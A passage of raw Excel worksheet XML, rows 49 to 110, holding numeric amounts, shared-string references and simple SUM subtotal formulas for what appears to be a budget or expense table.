        <v>33.5</v>
      </c>
      <c r="E49" s="1"/>
      <c r="F49" s="1"/>
      <c r="G49" s="1">
        <v>25</v>
      </c>
      <c r="H49" s="1">
        <v>20</v>
      </c>
      <c r="I49" s="1"/>
    </row>
    <row r="50" spans="1:9" ht="28.5">
      <c r="A50">
        <v>201</v>
      </c>
      <c r="B50" s="1" t="s">
        <v>474</v>
      </c>
      <c r="C50" s="1" t="s">
        <v>228</v>
      </c>
      <c r="D50" s="51">
        <v>53</v>
      </c>
      <c r="E50" s="1"/>
      <c r="F50" s="1"/>
      <c r="G50" s="1">
        <v>10</v>
      </c>
      <c r="H50" s="1"/>
      <c r="I50" s="1"/>
    </row>
    <row r="51" spans="1:9">
      <c r="A51">
        <v>201</v>
      </c>
      <c r="B51" s="1" t="s">
        <v>475</v>
      </c>
      <c r="C51" s="1" t="s">
        <v>476</v>
      </c>
      <c r="D51" s="51">
        <v>98.3</v>
      </c>
      <c r="E51" s="1"/>
      <c r="F51" s="1"/>
      <c r="G51" s="1">
        <v>44.8</v>
      </c>
      <c r="H51" s="1">
        <v>194</v>
      </c>
      <c r="I51" s="1"/>
    </row>
    <row r="52" spans="1:9">
      <c r="A52">
        <v>220</v>
      </c>
      <c r="B52" s="1" t="s">
        <v>477</v>
      </c>
      <c r="C52" s="1" t="s">
        <v>478</v>
      </c>
      <c r="D52" s="51">
        <v>11</v>
      </c>
      <c r="E52" s="1"/>
      <c r="F52" s="1">
        <v>11</v>
      </c>
      <c r="G52" s="1">
        <v>19</v>
      </c>
      <c r="H52" s="1">
        <v>11</v>
      </c>
      <c r="I52" s="1"/>
    </row>
    <row r="53" spans="1:9">
      <c r="A53">
        <v>201</v>
      </c>
      <c r="B53" s="1" t="s">
        <v>479</v>
      </c>
      <c r="C53" s="1" t="s">
        <v>230</v>
      </c>
      <c r="D53" s="51">
        <v>0</v>
      </c>
      <c r="E53" s="1"/>
      <c r="F53" s="1"/>
      <c r="G53" s="1"/>
      <c r="H53" s="1"/>
      <c r="I53" s="1"/>
    </row>
    <row r="54" spans="1:9" ht="28.5">
      <c r="A54">
        <v>201</v>
      </c>
      <c r="B54" s="1" t="s">
        <v>480</v>
      </c>
      <c r="C54" s="1" t="s">
        <v>232</v>
      </c>
      <c r="D54" s="51">
        <v>1855.0632000000001</v>
      </c>
      <c r="E54" s="56" t="s">
        <v>799</v>
      </c>
      <c r="F54" s="1"/>
      <c r="G54" s="1"/>
      <c r="H54" s="1"/>
      <c r="I54" s="1"/>
    </row>
    <row r="55" spans="1:9" s="55" customFormat="1" ht="20.25">
      <c r="A55"/>
      <c r="B55" s="53" t="s">
        <v>243</v>
      </c>
      <c r="C55" s="53"/>
      <c r="D55" s="54">
        <v>2336.7964999999999</v>
      </c>
      <c r="E55" s="53"/>
      <c r="F55" s="1">
        <f t="shared" ref="F55" si="1">SUM(F56:F62)</f>
        <v>156.28</v>
      </c>
      <c r="G55" s="1">
        <f>SUM(G56:G62)</f>
        <v>484.91999999999996</v>
      </c>
      <c r="H55" s="1">
        <f>SUM(H56:H62)</f>
        <v>2981.3199999999993</v>
      </c>
      <c r="I55" s="1"/>
    </row>
    <row r="56" spans="1:9">
      <c r="A56">
        <v>203</v>
      </c>
      <c r="B56" s="1" t="s">
        <v>481</v>
      </c>
      <c r="C56" s="1" t="s">
        <v>482</v>
      </c>
      <c r="D56" s="51">
        <v>133.28</v>
      </c>
      <c r="E56" s="1"/>
      <c r="F56" s="1">
        <v>133.28</v>
      </c>
      <c r="G56" s="1">
        <v>135.28</v>
      </c>
      <c r="H56" s="1">
        <v>141.28</v>
      </c>
      <c r="I56" s="1"/>
    </row>
    <row r="57" spans="1:9">
      <c r="A57">
        <v>203</v>
      </c>
      <c r="B57" s="1" t="s">
        <v>483</v>
      </c>
      <c r="C57" s="1" t="s">
        <v>484</v>
      </c>
      <c r="D57" s="51">
        <v>38.4</v>
      </c>
      <c r="E57" s="1"/>
      <c r="F57" s="1"/>
      <c r="G57" s="1">
        <v>25</v>
      </c>
      <c r="H57" s="1">
        <v>90.4</v>
      </c>
      <c r="I57" s="1"/>
    </row>
    <row r="58" spans="1:9" ht="57">
      <c r="A58">
        <v>204</v>
      </c>
      <c r="B58" s="1" t="s">
        <v>485</v>
      </c>
      <c r="C58" s="1" t="s">
        <v>246</v>
      </c>
      <c r="D58" s="51">
        <v>1526.3219999999999</v>
      </c>
      <c r="E58" s="1"/>
      <c r="F58" s="1"/>
      <c r="G58" s="1">
        <v>194.64</v>
      </c>
      <c r="H58" s="1">
        <v>2086.66</v>
      </c>
      <c r="I58" s="1"/>
    </row>
    <row r="59" spans="1:9" ht="42.75">
      <c r="A59">
        <v>204</v>
      </c>
      <c r="B59" s="1" t="s">
        <v>486</v>
      </c>
      <c r="C59" s="1" t="s">
        <v>248</v>
      </c>
      <c r="D59" s="51">
        <v>316.89449999999999</v>
      </c>
      <c r="E59" s="1"/>
      <c r="F59" s="1"/>
      <c r="G59" s="1">
        <v>11</v>
      </c>
      <c r="H59" s="1">
        <v>465.14</v>
      </c>
      <c r="I59" s="1"/>
    </row>
    <row r="60" spans="1:9" ht="28.5">
      <c r="A60">
        <v>204</v>
      </c>
      <c r="B60" s="1" t="s">
        <v>487</v>
      </c>
      <c r="C60" s="1" t="s">
        <v>488</v>
      </c>
      <c r="D60" s="51">
        <v>110</v>
      </c>
      <c r="E60" s="1"/>
      <c r="F60" s="1">
        <v>23</v>
      </c>
      <c r="G60" s="1">
        <v>23</v>
      </c>
      <c r="H60" s="1">
        <v>3</v>
      </c>
      <c r="I60" s="1"/>
    </row>
    <row r="61" spans="1:9">
      <c r="A61">
        <v>204</v>
      </c>
      <c r="B61" s="1" t="s">
        <v>489</v>
      </c>
      <c r="C61" s="1" t="s">
        <v>250</v>
      </c>
      <c r="D61" s="51">
        <v>109.3</v>
      </c>
      <c r="E61" s="1"/>
      <c r="F61" s="1"/>
      <c r="G61" s="1">
        <v>66</v>
      </c>
      <c r="H61" s="1">
        <v>144.24</v>
      </c>
      <c r="I61" s="1"/>
    </row>
    <row r="62" spans="1:9" ht="28.5">
      <c r="A62">
        <v>204</v>
      </c>
      <c r="B62" s="1" t="s">
        <v>490</v>
      </c>
      <c r="C62" s="1" t="s">
        <v>252</v>
      </c>
      <c r="D62" s="51">
        <v>52.6</v>
      </c>
      <c r="E62" s="1"/>
      <c r="F62" s="1"/>
      <c r="G62" s="1">
        <v>30</v>
      </c>
      <c r="H62" s="1">
        <v>50.6</v>
      </c>
      <c r="I62" s="1"/>
    </row>
    <row r="63" spans="1:9">
      <c r="A63">
        <v>204</v>
      </c>
      <c r="B63" s="1" t="s">
        <v>491</v>
      </c>
      <c r="C63" s="1" t="s">
        <v>492</v>
      </c>
      <c r="D63" s="51">
        <v>50</v>
      </c>
      <c r="E63" s="1"/>
      <c r="F63" s="1"/>
      <c r="G63" s="1"/>
      <c r="H63" s="1"/>
      <c r="I63" s="1"/>
    </row>
    <row r="64" spans="1:9" s="55" customFormat="1" ht="20.25">
      <c r="A64"/>
      <c r="B64" s="53" t="s">
        <v>255</v>
      </c>
      <c r="C64" s="53"/>
      <c r="D64" s="54">
        <v>10374.912</v>
      </c>
      <c r="E64" s="53"/>
      <c r="F64" s="1">
        <f t="shared" ref="F64:H64" si="2">SUM(F65:F69)</f>
        <v>731</v>
      </c>
      <c r="G64" s="1">
        <f t="shared" si="2"/>
        <v>6844</v>
      </c>
      <c r="H64" s="1">
        <f t="shared" si="2"/>
        <v>5735</v>
      </c>
      <c r="I64" s="1"/>
    </row>
    <row r="65" spans="1:9" ht="57">
      <c r="A65">
        <v>205</v>
      </c>
      <c r="B65" s="1" t="s">
        <v>493</v>
      </c>
      <c r="C65" s="1" t="s">
        <v>494</v>
      </c>
      <c r="D65" s="51">
        <v>8117.0119999999997</v>
      </c>
      <c r="E65" s="56" t="s">
        <v>798</v>
      </c>
      <c r="F65" s="1">
        <v>731</v>
      </c>
      <c r="G65" s="1">
        <v>5388</v>
      </c>
      <c r="H65" s="1">
        <v>5735</v>
      </c>
      <c r="I65" s="1"/>
    </row>
    <row r="66" spans="1:9">
      <c r="A66">
        <v>205</v>
      </c>
      <c r="B66" s="1" t="s">
        <v>495</v>
      </c>
      <c r="C66" s="1" t="s">
        <v>257</v>
      </c>
      <c r="D66" s="51">
        <v>70</v>
      </c>
      <c r="E66" s="1"/>
      <c r="F66" s="1"/>
      <c r="G66" s="1"/>
      <c r="H66" s="1"/>
      <c r="I66" s="1"/>
    </row>
    <row r="67" spans="1:9">
      <c r="A67">
        <v>205</v>
      </c>
      <c r="B67" s="1" t="s">
        <v>496</v>
      </c>
      <c r="C67" s="1" t="s">
        <v>259</v>
      </c>
      <c r="D67" s="51">
        <v>0</v>
      </c>
      <c r="E67" s="1"/>
      <c r="F67" s="1"/>
      <c r="G67" s="1"/>
      <c r="H67" s="1"/>
      <c r="I67" s="1"/>
    </row>
    <row r="68" spans="1:9">
      <c r="A68">
        <v>205</v>
      </c>
      <c r="B68" s="1" t="s">
        <v>497</v>
      </c>
      <c r="C68" s="1" t="s">
        <v>498</v>
      </c>
      <c r="D68" s="51">
        <v>144.9</v>
      </c>
      <c r="E68" s="1"/>
      <c r="F68" s="1"/>
      <c r="G68" s="1"/>
      <c r="H68" s="1"/>
      <c r="I68" s="1"/>
    </row>
    <row r="69" spans="1:9" ht="28.5">
      <c r="A69">
        <v>205</v>
      </c>
      <c r="B69" s="1" t="s">
        <v>499</v>
      </c>
      <c r="C69" s="1" t="s">
        <v>261</v>
      </c>
      <c r="D69" s="51">
        <v>2043</v>
      </c>
      <c r="E69" s="56" t="s">
        <v>795</v>
      </c>
      <c r="F69" s="1"/>
      <c r="G69" s="1">
        <v>1456</v>
      </c>
      <c r="H69" s="1"/>
      <c r="I69" s="1"/>
    </row>
    <row r="70" spans="1:9" s="55" customFormat="1" ht="20.25">
      <c r="A70"/>
      <c r="B70" s="53" t="s">
        <v>262</v>
      </c>
      <c r="C70" s="53"/>
      <c r="D70" s="54">
        <v>696.13199999999995</v>
      </c>
      <c r="E70" s="53"/>
      <c r="F70" s="1">
        <f t="shared" ref="F70:H70" si="3">SUM(F71:F79)</f>
        <v>98</v>
      </c>
      <c r="G70" s="1">
        <f t="shared" si="3"/>
        <v>387.5</v>
      </c>
      <c r="H70" s="1">
        <f t="shared" si="3"/>
        <v>1101.8600000000001</v>
      </c>
      <c r="I70" s="1"/>
    </row>
    <row r="71" spans="1:9" ht="57">
      <c r="A71">
        <v>207</v>
      </c>
      <c r="B71" s="1" t="s">
        <v>500</v>
      </c>
      <c r="C71" s="1" t="s">
        <v>501</v>
      </c>
      <c r="D71" s="51">
        <v>63</v>
      </c>
      <c r="E71" s="1"/>
      <c r="F71" s="1"/>
      <c r="G71" s="1">
        <v>14</v>
      </c>
      <c r="H71" s="1">
        <v>12</v>
      </c>
      <c r="I71" s="1"/>
    </row>
    <row r="72" spans="1:9" ht="42.75">
      <c r="A72">
        <v>207</v>
      </c>
      <c r="B72" s="1" t="s">
        <v>502</v>
      </c>
      <c r="C72" s="1" t="s">
        <v>264</v>
      </c>
      <c r="D72" s="51">
        <v>154.83199999999999</v>
      </c>
      <c r="E72" s="1"/>
      <c r="F72" s="1"/>
      <c r="G72" s="1">
        <f>70.5</f>
        <v>70.5</v>
      </c>
      <c r="H72" s="1">
        <v>498.7</v>
      </c>
      <c r="I72" s="1"/>
    </row>
    <row r="73" spans="1:9" ht="28.5">
      <c r="A73">
        <v>207</v>
      </c>
      <c r="B73" s="1" t="s">
        <v>503</v>
      </c>
      <c r="C73" s="1" t="s">
        <v>274</v>
      </c>
      <c r="D73" s="51">
        <v>93.6</v>
      </c>
      <c r="E73" s="1"/>
      <c r="F73" s="1"/>
      <c r="G73" s="1">
        <v>48</v>
      </c>
      <c r="H73" s="1">
        <v>97</v>
      </c>
      <c r="I73" s="1"/>
    </row>
    <row r="74" spans="1:9">
      <c r="A74">
        <v>207</v>
      </c>
      <c r="B74" s="1" t="s">
        <v>504</v>
      </c>
      <c r="C74" s="1" t="s">
        <v>266</v>
      </c>
      <c r="D74" s="51">
        <v>17.7</v>
      </c>
      <c r="E74" s="1"/>
      <c r="F74" s="1"/>
      <c r="G74" s="1">
        <v>20</v>
      </c>
      <c r="H74" s="1">
        <v>6</v>
      </c>
      <c r="I74" s="1"/>
    </row>
    <row r="75" spans="1:9">
      <c r="A75">
        <v>207</v>
      </c>
      <c r="B75" s="1" t="s">
        <v>505</v>
      </c>
      <c r="C75" s="1" t="s">
        <v>268</v>
      </c>
      <c r="D75" s="51">
        <v>40</v>
      </c>
      <c r="E75" s="1"/>
      <c r="F75" s="1"/>
      <c r="G75" s="1">
        <v>36</v>
      </c>
      <c r="H75" s="1">
        <v>50</v>
      </c>
      <c r="I75" s="1"/>
    </row>
    <row r="76" spans="1:9" ht="28.5">
      <c r="A76">
        <v>207</v>
      </c>
      <c r="B76" s="1" t="s">
        <v>506</v>
      </c>
      <c r="C76" s="1" t="s">
        <v>507</v>
      </c>
      <c r="D76" s="51">
        <v>51</v>
      </c>
      <c r="E76" s="1"/>
      <c r="F76" s="1"/>
      <c r="G76" s="1">
        <v>5</v>
      </c>
      <c r="H76" s="1">
        <v>19.16</v>
      </c>
      <c r="I76" s="1"/>
    </row>
    <row r="77" spans="1:9" ht="28.5">
      <c r="A77">
        <v>207</v>
      </c>
      <c r="B77" s="1" t="s">
        <v>508</v>
      </c>
      <c r="C77" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D77" s="51">
        <v>73</v>
      </c>
      <c r="E77" s="1"/>
      <c r="F77" s="1">
        <v>5</v>
      </c>
      <c r="G77" s="1">
        <v>72</v>
      </c>
      <c r="H77" s="1">
        <v>290</v>
      </c>
      <c r="I77" s="1">
        <f>72-10-3-30</f>
        <v>29</v>
      </c>
    </row>
    <row r="78" spans="1:9">
      <c r="A78">
        <v>207</v>
      </c>
      <c r="B78" s="1" t="s">
        <v>509</v>
      </c>
      <c r="C78" s="1" t="s">
        <v>510</v>
      </c>
      <c r="D78" s="51">
        <v>170</v>
      </c>
      <c r="E78" s="1"/>
      <c r="F78" s="1">
        <v>70</v>
      </c>
      <c r="G78" s="1">
        <v>75</v>
      </c>
      <c r="H78" s="1">
        <v>124</v>
      </c>
      <c r="I78" s="1"/>
    </row>
    <row r="79" spans="1:9">
      <c r="A79">
        <v>207</v>
      </c>
      <c r="B79" s="1" t="s">
        <v>511</v>
      </c>
      <c r="C79" s="1" t="s">
        <v>272</v>
      </c>
      <c r="D79" s="51">
        <v>33</v>
      </c>
      <c r="E79" s="1"/>
      <c r="F79" s="1">
        <v>23</v>
      </c>
      <c r="G79" s="1">
        <f>167-120</f>
        <v>47</v>
      </c>
      <c r="H79" s="1">
        <v>5</v>
      </c>
      <c r="I79" s="1"/>
    </row>
    <row r="80" spans="1:9" s="55" customFormat="1" ht="20.25">
      <c r="A80"/>
      <c r="B80" s="53" t="s">
        <v>275</v>
      </c>
      <c r="C80" s="53"/>
      <c r="D80" s="54">
        <v>3625.7224000000001</v>
      </c>
      <c r="E80" s="53"/>
      <c r="F80" s="1">
        <f t="shared" ref="F80:H80" si="4">SUM(F81:F84)</f>
        <v>589</v>
      </c>
      <c r="G80" s="1">
        <f t="shared" si="4"/>
        <v>1402</v>
      </c>
      <c r="H80" s="1">
        <f t="shared" si="4"/>
        <v>2925.8599999999997</v>
      </c>
      <c r="I80" s="1"/>
    </row>
    <row r="81" spans="1:9">
      <c r="A81">
        <v>208</v>
      </c>
      <c r="B81" s="1" t="s">
        <v>512</v>
      </c>
      <c r="C81" s="1" t="s">
        <v>218</v>
      </c>
      <c r="D81" s="51">
        <v>136.46</v>
      </c>
      <c r="E81" s="1"/>
      <c r="F81" s="1"/>
      <c r="G81" s="1"/>
      <c r="H81" s="1"/>
      <c r="I81" s="1"/>
    </row>
    <row r="82" spans="1:9" ht="57">
      <c r="A82">
        <v>208</v>
      </c>
      <c r="B82" s="1" t="s">
        <v>513</v>
      </c>
      <c r="C82" s="1" t="s">
        <v>277</v>
      </c>
      <c r="D82" s="51">
        <v>1942.4</v>
      </c>
      <c r="E82" s="1"/>
      <c r="F82" s="1">
        <v>442</v>
      </c>
      <c r="G82" s="1">
        <v>321</v>
      </c>
      <c r="H82" s="1">
        <v>1937.56</v>
      </c>
      <c r="I82" s="1"/>
    </row>
    <row r="83" spans="1:9" ht="42.75">
      <c r="A83">
        <v>208</v>
      </c>
      <c r="B83" s="1" t="s">
        <v>514</v>
      </c>
      <c r="C83" s="1" t="s">
        <v>515</v>
      </c>
      <c r="D83" s="51">
        <v>595.41999999999996</v>
      </c>
      <c r="E83" s="56" t="s">
        <v>796</v>
      </c>
      <c r="F83" s="1">
        <v>51</v>
      </c>
      <c r="G83" s="1">
        <v>673</v>
      </c>
      <c r="H83" s="1">
        <v>260</v>
      </c>
      <c r="I83" s="1"/>
    </row>
    <row r="84" spans="1:9" ht="71.25">
      <c r="A84">
        <v>208</v>
      </c>
      <c r="B84" s="1" t="s">
        <v>516</v>
      </c>
      <c r="C84" s="1" t="s">
        <v>280</v>
      </c>
      <c r="D84" s="51">
        <v>951.44240000000002</v>
      </c>
      <c r="E84" s="1"/>
      <c r="F84" s="1">
        <v>96</v>
      </c>
      <c r="G84" s="1">
        <v>408</v>
      </c>
      <c r="H84" s="1">
        <v>728.3</v>
      </c>
      <c r="I84" s="1"/>
    </row>
    <row r="85" spans="1:9" s="55" customFormat="1" ht="20.25">
      <c r="A85"/>
      <c r="B85" s="53" t="s">
        <v>281</v>
      </c>
      <c r="C85" s="53"/>
      <c r="D85" s="54">
        <v>3376.03</v>
      </c>
      <c r="E85" s="53"/>
      <c r="F85" s="1">
        <f t="shared" ref="F85:H85" si="5">SUM(F86:F90)</f>
        <v>33</v>
      </c>
      <c r="G85" s="1">
        <f t="shared" si="5"/>
        <v>1903.3899999999999</v>
      </c>
      <c r="H85" s="1">
        <f t="shared" si="5"/>
        <v>2677.87</v>
      </c>
      <c r="I85" s="1"/>
    </row>
    <row r="86" spans="1:9" ht="57">
      <c r="A86">
        <v>210</v>
      </c>
      <c r="B86" s="1" t="s">
        <v>517</v>
      </c>
      <c r="C86" s="1" t="s">
        <v>283</v>
      </c>
      <c r="D86" s="51">
        <v>1773.11</v>
      </c>
      <c r="E86" s="1"/>
      <c r="F86" s="1">
        <v>80</v>
      </c>
      <c r="G86" s="1">
        <f>682+616.49</f>
        <v>1298.49</v>
      </c>
      <c r="H86" s="1">
        <v>2010.99</v>
      </c>
      <c r="I86" s="1"/>
    </row>
    <row r="87" spans="1:9" ht="28.5">
      <c r="A87">
        <v>210</v>
      </c>
      <c r="B87" s="1" t="s">
        <v>518</v>
      </c>
      <c r="C87" s="1" t="s">
        <v>285</v>
      </c>
      <c r="D87" s="51">
        <v>1035.92</v>
      </c>
      <c r="E87" s="56" t="s">
        <v>797</v>
      </c>
      <c r="F87" s="1"/>
      <c r="G87" s="1">
        <v>108</v>
      </c>
      <c r="H87" s="1">
        <v>352.88</v>
      </c>
      <c r="I87" s="1"/>
    </row>
    <row r="88" spans="1:9" ht="28.5">
      <c r="A88">
        <v>210</v>
      </c>
      <c r="B88" s="1" t="s">
        <v>519</v>
      </c>
      <c r="C88" s="1" t="s">
        <v>520</v>
      </c>
      <c r="D88" s="51">
        <v>272</v>
      </c>
      <c r="E88" s="1"/>
      <c r="F88" s="1">
        <v>7</v>
      </c>
      <c r="G88" s="1">
        <v>266.89999999999998</v>
      </c>
      <c r="H88" s="1">
        <v>134</v>
      </c>
      <c r="I88" s="1"/>
    </row>
    <row r="89" spans="1:9" ht="28.5">
      <c r="A89">
        <v>210</v>
      </c>
      <c r="B89" s="1" t="s">
        <v>521</v>
      </c>
      <c r="C89" s="1" t="s">
        <v>522</v>
      </c>
      <c r="D89" s="51">
        <v>115</v>
      </c>
      <c r="E89" s="1"/>
      <c r="F89" s="1"/>
      <c r="G89" s="1">
        <v>50</v>
      </c>
      <c r="H89" s="1"/>
      <c r="I89" s="1"/>
    </row>
    <row r="90" spans="1:9" ht="28.5">
      <c r="A90">
        <v>210</v>
      </c>
      <c r="B90" s="1" t="s">
        <v>523</v>
      </c>
      <c r="C90" s="1" t="s">
        <v>524</v>
      </c>
      <c r="D90" s="51">
        <v>180</v>
      </c>
      <c r="E90" s="1"/>
      <c r="F90" s="1">
        <v>-54</v>
      </c>
      <c r="G90" s="1">
        <v>180</v>
      </c>
      <c r="H90" s="1">
        <v>180</v>
      </c>
      <c r="I90" s="1"/>
    </row>
    <row r="91" spans="1:9" s="55" customFormat="1" ht="20.25">
      <c r="A91"/>
      <c r="B91" s="53" t="s">
        <v>287</v>
      </c>
      <c r="C91" s="53"/>
      <c r="D91" s="54">
        <v>9761.86</v>
      </c>
      <c r="E91" s="53"/>
      <c r="F91" s="1">
        <f t="shared" ref="F91:H91" si="6">SUM(F92:F97)</f>
        <v>90</v>
      </c>
      <c r="G91" s="1">
        <f t="shared" si="6"/>
        <v>406</v>
      </c>
      <c r="H91" s="1">
        <f t="shared" si="6"/>
        <v>1094.9000000000001</v>
      </c>
      <c r="I91" s="1"/>
    </row>
    <row r="92" spans="1:9">
      <c r="A92">
        <v>220</v>
      </c>
      <c r="B92" s="1" t="s">
        <v>525</v>
      </c>
      <c r="C92" s="1" t="s">
        <v>289</v>
      </c>
      <c r="D92" s="51">
        <v>434.46</v>
      </c>
      <c r="E92" s="1"/>
      <c r="F92" s="1">
        <v>90</v>
      </c>
      <c r="G92" s="1">
        <v>333</v>
      </c>
      <c r="H92" s="1">
        <v>832.9</v>
      </c>
      <c r="I92" s="1"/>
    </row>
    <row r="93" spans="1:9">
      <c r="A93">
        <v>211</v>
      </c>
      <c r="B93" s="1" t="s">
        <v>526</v>
      </c>
      <c r="C93" s="1" t="s">
        <v>527</v>
      </c>
      <c r="D93" s="51">
        <v>170</v>
      </c>
      <c r="E93" s="1"/>
      <c r="F93" s="1"/>
      <c r="G93" s="1">
        <v>73</v>
      </c>
      <c r="H93" s="1">
        <v>262</v>
      </c>
      <c r="I93" s="1"/>
    </row>
    <row r="94" spans="1:9" ht="28.5">
      <c r="A94">
        <v>211</v>
      </c>
      <c r="B94" s="1" t="s">
        <v>528</v>
      </c>
      <c r="C94" s="1" t="s">
        <v>529</v>
      </c>
      <c r="D94" s="51">
        <v>5247.4</v>
      </c>
      <c r="E94" s="1"/>
      <c r="F94" s="1"/>
      <c r="G94" s="1"/>
      <c r="H94" s="1"/>
      <c r="I94" s="1"/>
    </row>
    <row r="95" spans="1:9" ht="42.75">
      <c r="A95">
        <v>211</v>
      </c>
      <c r="B95" s="1" t="s">
        <v>530</v>
      </c>
      <c r="C95" s="1" t="s">
        <v>531</v>
      </c>
      <c r="D95" s="51">
        <v>293</v>
      </c>
      <c r="E95" s="1"/>
      <c r="F95" s="1"/>
      <c r="G95" s="1"/>
      <c r="H95" s="1"/>
      <c r="I95" s="1"/>
    </row>
    <row r="96" spans="1:9" ht="28.5">
      <c r="A96">
        <v>211</v>
      </c>
      <c r="B96" s="1" t="s">
        <v>532</v>
      </c>
      <c r="C96" s="1" t="s">
        <v>533</v>
      </c>
      <c r="D96" s="51">
        <v>117</v>
      </c>
      <c r="E96" s="1"/>
      <c r="F96" s="1"/>
      <c r="G96" s="1"/>
      <c r="H96" s="1"/>
      <c r="I96" s="1"/>
    </row>
    <row r="97" spans="1:9" ht="28.5">
      <c r="A97">
        <v>213</v>
      </c>
      <c r="B97" s="1" t="s">
        <v>534</v>
      </c>
      <c r="C97" s="1" t="s">
        <v>535</v>
      </c>
      <c r="D97" s="51">
        <v>3500</v>
      </c>
      <c r="E97" s="1"/>
      <c r="F97" s="1"/>
      <c r="G97" s="1"/>
      <c r="H97" s="1"/>
      <c r="I97" s="1"/>
    </row>
    <row r="98" spans="1:9" s="55" customFormat="1" ht="20.25">
      <c r="A98"/>
      <c r="B98" s="53" t="s">
        <v>291</v>
      </c>
      <c r="C98" s="53"/>
      <c r="D98" s="54">
        <v>22733.112799999999</v>
      </c>
      <c r="E98" s="53"/>
      <c r="F98" s="1">
        <f t="shared" ref="F98:H98" si="7">SUM(F99:F110)</f>
        <v>-70.459999999999994</v>
      </c>
      <c r="G98" s="1">
        <f t="shared" si="7"/>
        <v>40</v>
      </c>
      <c r="H98" s="1">
        <f t="shared" si="7"/>
        <v>10957.779999999999</v>
      </c>
      <c r="I98" s="1"/>
    </row>
    <row r="99" spans="1:9" ht="71.25">
      <c r="A99">
        <v>212</v>
      </c>
      <c r="B99" s="1" t="s">
        <v>536</v>
      </c>
      <c r="C99" s="1" t="s">
        <v>294</v>
      </c>
      <c r="D99" s="51">
        <v>2872.5</v>
      </c>
      <c r="E99" s="1"/>
      <c r="F99" s="1">
        <v>-70.459999999999994</v>
      </c>
      <c r="G99" s="1">
        <v>40</v>
      </c>
      <c r="H99" s="1">
        <v>5732.5</v>
      </c>
      <c r="I99" s="1" t="s">
        <v>537</v>
      </c>
    </row>
    <row r="100" spans="1:9" ht="28.5">
      <c r="A100">
        <v>212</v>
      </c>
      <c r="B100" s="1" t="s">
        <v>538</v>
      </c>
      <c r="C100" s="1" t="s">
        <v>296</v>
      </c>
      <c r="D100" s="51">
        <v>647.9</v>
      </c>
      <c r="E100" s="1"/>
      <c r="F100" s="1"/>
      <c r="G100" s="1"/>
      <c r="H100" s="1">
        <v>397.5</v>
      </c>
      <c r="I100" s="1"/>
    </row>
    <row r="101" spans="1:9" ht="28.5">
      <c r="A101">
        <v>214</v>
      </c>
      <c r="B101" s="1" t="s">
        <v>539</v>
      </c>
      <c r="C101" s="1" t="s">
        <v>540</v>
      </c>
      <c r="D101" s="51">
        <v>908.9</v>
      </c>
      <c r="E101" s="1"/>
      <c r="F101" s="1"/>
      <c r="G101" s="1"/>
      <c r="H101" s="1">
        <v>1383.4</v>
      </c>
      <c r="I101" s="1"/>
    </row>
    <row r="102" spans="1:9" ht="28.5">
      <c r="A102">
        <v>212</v>
      </c>
      <c r="B102" s="1" t="s">
        <v>541</v>
      </c>
      <c r="C102" s="1" t="s">
        <v>542</v>
      </c>
      <c r="D102" s="51">
        <v>536.79999999999995</v>
      </c>
      <c r="E102" s="1"/>
      <c r="F102" s="1" t="s">
        <v>544</v>
      </c>
      <c r="G102" s="1"/>
      <c r="H102" s="1">
        <v>501.76</v>
      </c>
      <c r="I102" s="1"/>
    </row>
    <row r="103" spans="1:9" ht="28.5">
      <c r="A103">
        <v>212</v>
      </c>
      <c r="B103" s="1" t="s">
        <v>545</v>
      </c>
      <c r="C103" s="1" t="s">
        <v>546</v>
      </c>
      <c r="D103" s="51">
        <v>214.37</v>
      </c>
      <c r="E103" s="1"/>
      <c r="F103" s="1" t="s">
        <v>547</v>
      </c>
      <c r="G103" s="1"/>
      <c r="H103" s="1">
        <v>209.17</v>
      </c>
      <c r="I103" s="1"/>
    </row>
    <row r="104" spans="1:9" ht="28.5">
      <c r="A104">
        <v>212</v>
      </c>
      <c r="B104" s="1" t="s">
        <v>543</v>
      </c>
      <c r="C104" s="1" t="s">
        <v>548</v>
      </c>
      <c r="D104" s="51">
        <v>440.15</v>
      </c>
      <c r="E104" s="1"/>
      <c r="F104" s="1" t="s">
        <v>549</v>
      </c>
      <c r="G104" s="1"/>
      <c r="H104" s="1">
        <v>429.55</v>
      </c>
      <c r="I104" s="1"/>
    </row>
    <row r="105" spans="1:9" ht="71.25">
      <c r="A105">
        <v>212</v>
      </c>
      <c r="B105" s="1" t="s">
        <v>550</v>
      </c>
      <c r="C105" s="1" t="s">
        <v>298</v>
      </c>
      <c r="D105" s="51">
        <v>4664.8927999999996</v>
      </c>
      <c r="E105" s="1"/>
      <c r="F105" s="1"/>
      <c r="G105" s="1"/>
      <c r="H105" s="1">
        <v>2303.9</v>
      </c>
      <c r="I105" s="1" t="s">
        <v>537</v>
      </c>
    </row>
    <row r="106" spans="1:9" ht="28.5">
      <c r="A106">
        <v>212</v>
      </c>
      <c r="B106" s="1" t="s">
        <v>551</v>
      </c>
      <c r="C106" s="1" t="s">
        <v>300</v>
      </c>
      <c r="D106" s="51">
        <v>0</v>
      </c>
      <c r="E106" s="1"/>
      <c r="F106" s="1"/>
      <c r="G106" s="1"/>
      <c r="H106" s="1"/>
      <c r="I106" s="1"/>
    </row>
    <row r="107" spans="1:9">
      <c r="A107">
        <v>216</v>
      </c>
      <c r="B107" s="1" t="s">
        <v>552</v>
      </c>
      <c r="C107" s="1" t="s">
        <v>553</v>
      </c>
      <c r="D107" s="51">
        <v>720.6</v>
      </c>
      <c r="E107" s="1"/>
      <c r="F107" s="1"/>
      <c r="G107" s="1"/>
      <c r="H107" s="1"/>
      <c r="I107" s="1"/>
    </row>
    <row r="108" spans="1:9" ht="28.5">
      <c r="A108">
        <v>212</v>
      </c>
      <c r="B108" s="1" t="s">
        <v>554</v>
      </c>
      <c r="C108" s="1" t="s">
        <v>555</v>
      </c>
      <c r="D108" s="51">
        <v>90</v>
      </c>
      <c r="E108" s="1"/>
      <c r="F108" s="1"/>
      <c r="G108" s="1"/>
      <c r="H108" s="1"/>
      <c r="I108" s="1"/>
    </row>
    <row r="109" spans="1:9" ht="28.5">
      <c r="A109">
        <v>212</v>
      </c>
      <c r="B109" s="1" t="s">
        <v>556</v>
      </c>
      <c r="C109" s="1" t="s">
        <v>557</v>
      </c>
      <c r="D109" s="51">
        <v>407</v>
      </c>
      <c r="E109" s="1"/>
      <c r="F109" s="1"/>
      <c r="G109" s="1"/>
      <c r="H109" s="1"/>
      <c r="I109" s="1"/>
    </row>
    <row r="110" spans="1:9" ht="28.5">
      <c r="A110">
        <v>212</v>
      </c>
      <c r="B110" s="1" t="s">
        <v>558</v>
      </c>
      <c r="C110" s="1" t="s">
